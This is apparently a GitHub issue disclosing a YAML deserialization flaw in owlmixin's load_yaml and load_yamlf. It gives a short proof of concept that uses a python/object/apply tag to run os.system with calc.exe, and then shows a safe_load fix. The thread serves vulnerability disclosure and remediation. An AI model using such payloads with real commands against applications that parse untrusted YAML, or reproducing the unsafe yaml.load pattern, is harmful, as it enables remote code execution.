
load_yaml and load_yamlf methods are vulnerable #12

Closed
Joel-MalwareBenchmark opened this issue Nov 7, 2017 · 2 comments
Comments

@Joel-MalwareBenchmark

```python
from owlmixin import util

# Inline YAML: the full loader honours the python/object/apply tag and
# calls os.system with the supplied argument list.
util.load_yaml('!!python/object/apply:os.system ["calc.exe"]')

# Same payload read from a file; 'joel.yml' contains the line:
# !!python/object/apply:os.system ["calc.exe"]
util.load_yamlf('joel.yml', 'utf-8')
```

Hi, there is a vulnerability in the load_yaml and load_yamlf methods in util.py; please see the PoC above. It can execute arbitrary Python commands, resulting in command execution.

@tadashi-aikawa
Owner

Thank you for your kind report!
I will fix the problem as soon as possible by replacing load with safe_load.
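The fix the maintainer describes, as an added example that is not owlmixin's own code: the reported `yaml.load` pattern beside a `safe_load` replacement, with the PoC tag pointed at the harmless `builtins.len` (a constructed sample) so the difference is observable without running a shell command.

```python
"""Unsafe vs. safe YAML loading, modelled on owlmixin's util.load_yaml / load_yamlf.

Added example, not the project's code. Assumes PyYAML is installed.
"""
import os
import tempfile

import yaml

# Constructed samples. The tag is the one from the report, but it targets
# builtins.len instead of os.system so the demo never spawns a process.
MALICIOUS_DOC = '!!python/object/apply:builtins.len [[1, 2, 3]]'
BENIGN_DOC = 'name: owlmixin\nversion: 2.0.0a12\n'


def unsafe_load_yaml(text):
    """The vulnerable pattern: the full Loader resolves python/* tags, so the
    document can name any importable callable and have it invoked."""
    return yaml.load(text, Loader=yaml.Loader)


def load_yaml(text):
    """Hardened version: safe_load only builds plain data (str, int, list, dict,
    ...) and raises ConstructorError on tags it does not know."""
    return yaml.safe_load(text)


def load_yamlf(path, encoding='utf-8'):
    """File variant, same behaviour as the fixed load_yaml."""
    with open(path, encoding=encoding) as f:
        return load_yaml(f.read())


def is_rejected(loader, text):
    """True if the given loader refuses to construct the document."""
    try:
        loader(text)
    except yaml.constructor.ConstructorError:
        return True
    return False


def file_payload_rejected():
    """Write the malicious document to a temp file and check load_yamlf rejects it."""
    fd, path = tempfile.mkstemp(suffix='.yml')
    try:
        with os.fdopen(fd, 'w', encoding='utf-8') as f:
            f.write(MALICIOUS_DOC)
        return is_rejected(load_yamlf, path)
    finally:
        os.unlink(path)
```

With the full Loader the document evaluates to `len([1, 2, 3])`, i.e. `3`; with `safe_load` the same text fails at construction time, while ordinary configuration YAML still parses.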

@tadashi-aikawa tadashi-aikawa self-assigned this Nov 7, 2017
@tadashi-aikawa tadashi-aikawa modified the milestones: 2.0.0a12, 1.2.1 Nov 7, 2017
@tadashi-aikawa
Owner

Fix 2.0.0a12
